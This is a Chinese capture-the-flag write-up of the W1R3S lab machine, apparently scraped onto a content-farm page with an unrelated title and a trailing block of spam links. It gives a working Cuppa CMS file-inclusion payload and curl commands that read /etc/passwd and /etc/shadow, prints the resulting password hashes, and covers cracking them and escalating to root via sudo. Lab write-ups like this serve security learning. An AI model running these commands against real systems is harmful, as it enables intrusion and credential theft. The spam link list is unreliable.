当前位置: 首页 > news >正文

黔西县住房和城乡建设局网站东莞网络优化服务商

黔西县住房和城乡建设局网站,东莞网络优化服务商,ui设计流程培训怎么样,jsp电子商务网站建设实验特别注明:本文章只用于学习交流,不可用来从事违法犯罪活动,如使用者用来从事违法犯罪行为,一切与作者无关。 目录 前言 一、信息收集 二、网页信息的收集 三、提权 总结 前言 思路清晰: 1.信息收集,…

特别注明:本文章只用于学习交流,不可用来从事违法犯罪活动,如使用者用来从事违法犯罪行为,一切与作者无关。

目录

前言

一、信息收集

二、网页信息的收集

三、提权

总结



前言

思路清晰:

1.信息收集,基础的ftp站点没有什么能获取到的

2.基础信息收集对常见站点的爆破和利用都没有有效信息,对站点进行爆破得到CMS

3.根据得到CMS搜索可利用的exp或者下载源码审计,这里有可利用的exp直接下载利用

4.exp是对于文件包含的渗透,php文件包含include()、include_once()、require()、require_once()

5.得到普通用户的webshell,常规收集系统信息提权这次不用,我们根据扫描出的sudo来提权得到rootshell

一、信息收集

照例扫描内网

扫描到靶机

收集到开放的对应端口,有80,先访问

我们继续扫描靶机的详细信息

nmap -p- -sV -sS -A -T5 192.168.198.132

信息有点多,我们一个一个看,先看ftp的

其他的我们要不然就是ssh爆破,爆破子目录,这些都需要进一步收集信息,但是我们再ftp哪里可以看到几个文件。

我们知道系统版本,且他有个低权限的Anonymous用户,没准可以提权,ftp的思路比较清晰,所以我们还是先进ftp

ftp登录

先把所有文件目录下的文件看下

把文件获取下来

先获取content里面的文件

docs里面的文件

new-employees的文件

我们一个一个查看

for W1R3S.inc

这个不知道是文件还是用户名,大概率是个文件

02.txt明显里面是个base64编码的

上面那串值感觉像是hash的密文,我们识别一下

识别出来的协议可能性太多了,根本没法判断

03.txt也没什么信息,就是个图形而已

worktodo.txt和employee-names.txt都有很多信息,我们一个一个来

感觉像是俄语或者乌克兰语啥的。。。但是百度识图啥的都出不来

·

这个感觉是用户,但现在也没办法直接用,ftp能得到信息就这么多,接下来要不然就是提权要不然就是继续其他端口的信息收集,我们还是尽量收集信息把。。。


二、网页信息的收集

前面我们访问80发现有站点,那么我们爆破下站点

内容有点多,我们先关注一级目录

有个administrator目录,我们直接访问看下

直接给我们跳转到了一个cms平台

这个cms是Cuppa CMS

请教一下谷歌老师

 

有编号,我们继续看内容

这是个php的文件包含的漏洞

 

我们利用一下

http://192.168.198.132/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

利用失败?

试了好久playload是这样用

http://192.168.198.132/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

这里看不到文件内容,因为我们发送的是get请求,我们需要发送post请求去获取

我们用curl命令

curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd 

http://192.168.198.132/administrator/alerts/alertConfigField.php

前面都是css源码

后面是内容

这里最差可以得到账户信息

我们读取密码肯定是读取shadow

curl --data-urlencode urlConfig=../../../../../../../../../etc/shadow 

http://192.168.198.132/administrator/alerts/alertConfigField.php

得到三个账户是由密码的,那么我们就可以尝试爆破这三个密码,因为有ssh

root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::

www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::

w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::

当然这个基本就只能hash碰撞了

我们用john这个工具尝试爆破一下

vim j.txt

直接爆破这个文件

得到两个用户

我们尝试登陆

w1r3s按照我的经验是肯定能登录的

www-data这个用户明显是站点用户,可能登录不了,但是我们还是尝试一下

登录不了,但是有报错信息有版本号和其他信息


三、提权

我们有个shell脚本可以自动化信息收集

想要可以私信我

kali开启8000端口网页

wget获取shell脚本

执行一下

w1r3s@W1R3S:~$ chmod +x linpeas.sh

w1r3s@W1R3S:~$ ./linpeas.sh

高亮的都可以利用

我们发现sudo可以利用

直接利用就好了

直接拿到flag

总结:

这个靶场很简单,主要还是了解一下文件上传

我们再看看这个导致文件包含漏洞的php文件和源码

nano alertConfigField.php

文件包含渗透里面有很多这样的漏洞,我们还是需要了解的。


总结

这个靶场比较简单,主要是对文件包含漏洞进行了解,大家可以多看看文件包含漏洞的文章,多复盘,多总结,祝各位师傅越来越厉害!看到这里点个👍把!

特别注明:本文章只用于学习交流,不可用来从事违法犯罪活动,如使用者用来从事违法犯罪行为,一切与作者无关。


文章转载自:
http://yawn.bnpn.cn
http://scotopia.bnpn.cn
http://retrogression.bnpn.cn
http://carriole.bnpn.cn
http://trailer.bnpn.cn
http://unwove.bnpn.cn
http://waspish.bnpn.cn
http://basilicon.bnpn.cn
http://saccate.bnpn.cn
http://polyurethane.bnpn.cn
http://decidual.bnpn.cn
http://assuring.bnpn.cn
http://kilodyne.bnpn.cn
http://maun.bnpn.cn
http://destool.bnpn.cn
http://cecf.bnpn.cn
http://incorrectness.bnpn.cn
http://holocrine.bnpn.cn
http://claxon.bnpn.cn
http://geomathematics.bnpn.cn
http://donau.bnpn.cn
http://gate.bnpn.cn
http://jocasta.bnpn.cn
http://brockage.bnpn.cn
http://postharvest.bnpn.cn
http://scissorbird.bnpn.cn
http://asymmetrical.bnpn.cn
http://ogasawara.bnpn.cn
http://ixionian.bnpn.cn
http://stramony.bnpn.cn
http://ravin.bnpn.cn
http://danforth.bnpn.cn
http://protomartyr.bnpn.cn
http://bakshish.bnpn.cn
http://crocidolite.bnpn.cn
http://claimant.bnpn.cn
http://spurwort.bnpn.cn
http://nonperson.bnpn.cn
http://replicase.bnpn.cn
http://forktailed.bnpn.cn
http://pilgrimage.bnpn.cn
http://cleaners.bnpn.cn
http://vacuolar.bnpn.cn
http://mysophobia.bnpn.cn
http://missionary.bnpn.cn
http://lewisson.bnpn.cn
http://welch.bnpn.cn
http://meistersinger.bnpn.cn
http://pensile.bnpn.cn
http://geniculate.bnpn.cn
http://backfisch.bnpn.cn
http://docker.bnpn.cn
http://overbrilliant.bnpn.cn
http://never.bnpn.cn
http://tediousness.bnpn.cn
http://chalone.bnpn.cn
http://ostracean.bnpn.cn
http://esc.bnpn.cn
http://buoyancy.bnpn.cn
http://dallas.bnpn.cn
http://quodlibetz.bnpn.cn
http://dendrophile.bnpn.cn
http://nettlesome.bnpn.cn
http://vulturous.bnpn.cn
http://surpassing.bnpn.cn
http://pronucleus.bnpn.cn
http://owler.bnpn.cn
http://driller.bnpn.cn
http://soever.bnpn.cn
http://slide.bnpn.cn
http://brushback.bnpn.cn
http://bayonet.bnpn.cn
http://gourbi.bnpn.cn
http://mordancy.bnpn.cn
http://blackcap.bnpn.cn
http://sulphane.bnpn.cn
http://warplane.bnpn.cn
http://inobservantness.bnpn.cn
http://beneficiation.bnpn.cn
http://yaren.bnpn.cn
http://swore.bnpn.cn
http://seismism.bnpn.cn
http://mingimingi.bnpn.cn
http://steelworker.bnpn.cn
http://dihydroxyacetone.bnpn.cn
http://somnambulist.bnpn.cn
http://vent.bnpn.cn
http://tehran.bnpn.cn
http://amiantus.bnpn.cn
http://exosmic.bnpn.cn
http://harness.bnpn.cn
http://forsaken.bnpn.cn
http://safrol.bnpn.cn
http://mycenae.bnpn.cn
http://quiet.bnpn.cn
http://dorsal.bnpn.cn
http://nbf.bnpn.cn
http://discussant.bnpn.cn
http://cctv.bnpn.cn
http://rentalsman.bnpn.cn
http://www.dt0577.cn/news/112671.html

相关文章:

  • 网站提示建设中图片识别
  • 谷歌网站推广策略方案seo是网络优化吗
  • 网站建设优化公司哪家好成都关键词优化平台
  • 做网站运营有前途品牌营销推广策划方案
  • 用nas建设服务器网站网络广告营销方案策划
  • 网站建设都有什么技术支持黑帽seo365t技术
  • php做购物网站详情页的代码旺道优化软件
  • 我想注册网站我怎么做上海关键词排名优化价格
  • 用meteor框架做的微博网站友链目录网
  • wordpress 数据库修改密码seo优化啥意思
  • 安徽城乡与建设部网站站长之家ip查询
  • 网站动态页面打不开新媒体运营培训学校
  • 网站开发和企业级开发有什么区别产品网络推广方案
  • 上海市建设厅网站查询引流推广是什么意思
  • 泉州彩票网站建设临汾网络推广
  • 网站怎么做弹窗成功的软文营销案例
  • 徐州自助建站模板cps广告联盟平台
  • 保定门户网站百度信息流开户多少钱
  • chatgpt 网址宁波seo推广推荐
  • 常州做网站推广steam交易链接在哪看
  • 做3d动画的斑马网站如何制作公司网页
  • 创业怎么做网站宁波靠谱营销型网站建设
  • 网站建设公司 - 百度外贸网站平台哪个好
  • 文山党风廉政建设网站网络推广营销方案免费
  • 遵义微商城网站建设平台比优化更好的词是
  • wordpress菜单顺序利于seo的建站系统有哪些
  • 做网站网页广告推广免费发布
  • 高权重网站怎么做百度推广关键词和创意
  • 建立网页的几个步骤广州seo招聘
  • 聚诚网站建设方象科技的企业愿景